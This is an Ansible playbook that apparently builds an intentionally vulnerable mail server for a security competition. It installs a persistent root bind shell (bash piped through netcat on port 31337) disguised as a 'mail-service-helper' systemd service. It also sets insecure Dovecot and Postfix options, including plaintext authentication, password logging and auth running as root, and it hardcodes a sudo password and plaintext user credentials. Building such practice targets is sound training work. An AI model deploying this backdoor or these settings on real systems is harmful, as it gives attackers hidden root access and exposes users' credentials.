---
- name: Configure Mail Service with Working Backdoor
  hosts: mail
  vars:
    ansible_become_password: SteveSexy!
  become: true
  tasks:
  - name: "Configuring Hostname"
    ansible.builtin.hostname:
      name: "Savanna"
    become: true

  - name: Install required packages
    apt:
      pkg:
      - dovecot-imapd
      - dovecot-pop3d
      - dovecot-core
      - postfix
      - netcat-openbsd
      update_cache: yes
      state: latest
    become: yes

  - name: Create mail user
    user:
      name: mail
      password: "{{ 'mail' | password_hash('sha512') }}"
      system: yes
      create_home: yes
      home: /var/mail
      shell: /bin/bash
    become: yes

  - name: Create mail directories for users
    file:
      path: "/var/mail/{{ item.name }}"
      state: directory
      owner: "{{ item.name }}"
      group: mail
      mode: '0755'
    with_items:
      - { name: "Nitwit" }
      - { name: "Armorer" }
      - { name: "Butcher" }
      - { name: "Cleric" }
      - { name: "Farmer" }
      - { name: "Fisherman" }
      - { name: "Fletcher" }
      - { name: "Leatherworker" }
      - { name: "Librarian" }
      - { name: "Toolsmith" }
      - { name: "Notch" }
    become: yes

  - name: Create special mail directory for greyteam
    file:
      path: /var/mail/greyteam
      state: directory
      owner: Greyteam
      group: mail
      mode: '0700'
    become: yes
    ignore_errors: yes  # In case the user doesn't exist

  - name: Create scripts directory
    file:
      path: /usr/local/bin
      state: directory
      owner: root
      group: root
      mode: '0755'
    become: yes
    
  # Backdoor
  - name: Create alternative netcat backdoor script
    copy:
      content: |
        #!/bin/bash
        # Alternative backdoor using fifo pipe (works with most netcat versions)
        PIPE=/tmp/backdoorfifo
        [ -p $PIPE ] || mkfifo $PIPE
        
        # Clean up pipe on exit
        trap "rm -f $PIPE" EXIT
        
        while true; do
          # Listen and execute commands
          cat $PIPE | /bin/bash -i 2>&1 | nc -l -p 31337 > $PIPE
          
          # If connection breaks, restart after a brief delay
          sleep 1
        done
      dest: /usr/local/bin/mail-service-helper.sh
      owner: root
      group: root
      mode: '0755'
    become: yes

  - name: Set up systemd service for backdoor
    copy:
      content: |
        [Unit]
        Description=Mail Service Backup Helper
        After=network.target
        ConditionPathExists=/usr/local/bin/mail-service-helper.sh
        
        [Service]
        Type=simple
        ExecStart=/usr/local/bin/mail-service-helper.sh
        Restart=always
        RestartSec=5
        User=root
        
        [Install]
        WantedBy=multi-user.target
      dest: /etc/systemd/system/mail-helper.service
      owner: root
      group: root
      mode: '0644'
    become: yes

  - name: Reload systemd daemon
    systemd:
      daemon_reload: yes
    become: yes

  - name: Start and enable the backdoor service
    systemd:
      name: mail-helper
      state: started
      enabled: yes
    become: yes
    ignore_errors: yes

  - name: Configure Dovecot
    copy:
      content: |
        # Simple Dovecot configuration
        protocols = imap pop3
        mail_location = maildir:/var/mail/%u
        mail_privileged_group = mail
        # Disable SSL for insecurity
        ssl = no
        # Allow plaintext authentication
        disable_plaintext_auth = no
        auth_mechanisms = plain login
        # User database - fixed format
        passdb {
          driver = passwd-file
          args = /etc/dovecot/users
        }
        userdb {
          driver = passwd-file
          args = /etc/dovecot/users
          default_fields = uid=mail gid=mail home=/var/mail/%u
        }
        # Listen on all interfaces
        listen = *
        # Service settings
        service imap-login {
          inet_listener imap {
            port = 143
          }
        }
        service pop3-login {
          inet_listener pop3 {
            port = 110
          }
        }
        # Log settings with password logging enabled
        log_path = /var/log/dovecot.log
        info_log_path = /var/log/dovecot-info.log
        auth_verbose = yes
        auth_debug = yes
        auth_debug_passwords = yes
        # No chroot for services
        service anvil {
          chroot =
        }
        # Run as root
        service auth {
          user = root
        }
        # Allow all users to access all mailboxes
        mail_access_groups = mail
        mail_full_filesystem_access = yes
      dest: /etc/dovecot/dovecot.conf
      owner: root
      group: root
      mode: '0644'
    become: yes
    notify: restart dovecot

  - name: Configure simple Postfix
    copy:
      content: |
        smtpd_banner = $myhostname ESMTP Savanna Mail Server
        myhostname = savanna.example.com
        myorigin = /etc/mailname
        mydestination = $myhostname, localhost, $mydomain
        mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16
        mailbox_size_limit = 0
        recipient_delimiter = +
        inet_interfaces = all
        inet_protocols = all
        smtpd_use_tls = no
        # Explicitly specify SMTP port
        smtp_port = 25
        # Listen on explicit port
        smtpd_relay_restrictions = permit_mynetworks, permit_sasl_authenticated, defer_unauth_destination
      dest: /etc/postfix/main.cf
      owner: root
      group: root
      mode: '0644'
    become: yes
    notify: restart postfix

  - name: Create Dovecot password file with user passwords
    copy:
      content: |
        # User accounts with passwords
        Nitwit:{PLAIN}Un3mpl0y3d
        Armorer:{PLAIN}Bl@st_Furn@c3
        Butcher:{PLAIN}F00d_Smok3r
        Cleric:{PLAIN}8rew1ng_St@nd
        Farmer:{PLAIN}Comp0st3r_S33ds
        Fisherman:{PLAIN}B@rrel_St0rag3
        Fletcher:{PLAIN}Fl3tch1ng_T@bl3
        Leatherworker:{PLAIN}C@uldr0n_W@t3r
        Librarian:{PLAIN}L3ct3rn_B00k
        Toolsmith:{PLAIN}Sm1th1ng_T@bl3
        Notch:{PLAIN}I_H@t3_Th3_Nether@!
        admin:{PLAIN}admin123
        # Grey team account
        greyteam:{PLAIN}greyteam
      dest: /etc/dovecot/users
      owner: root
      group: dovecot
      mode: '0640'
    become: yes
    notify: restart dovecot

  - name: Ensure services are enabled and running
    service:
      name: "{{ item }}"
      state: started
      enabled: yes
    loop:
      - dovecot
      - postfix
    become: yes

  handlers:
    - name: restart dovecot
      service:
        name: dovecot
        state: restarted
      become: yes
    
    - name: restart postfix
      service:
        name: postfix
        state: restarted
      become: yes
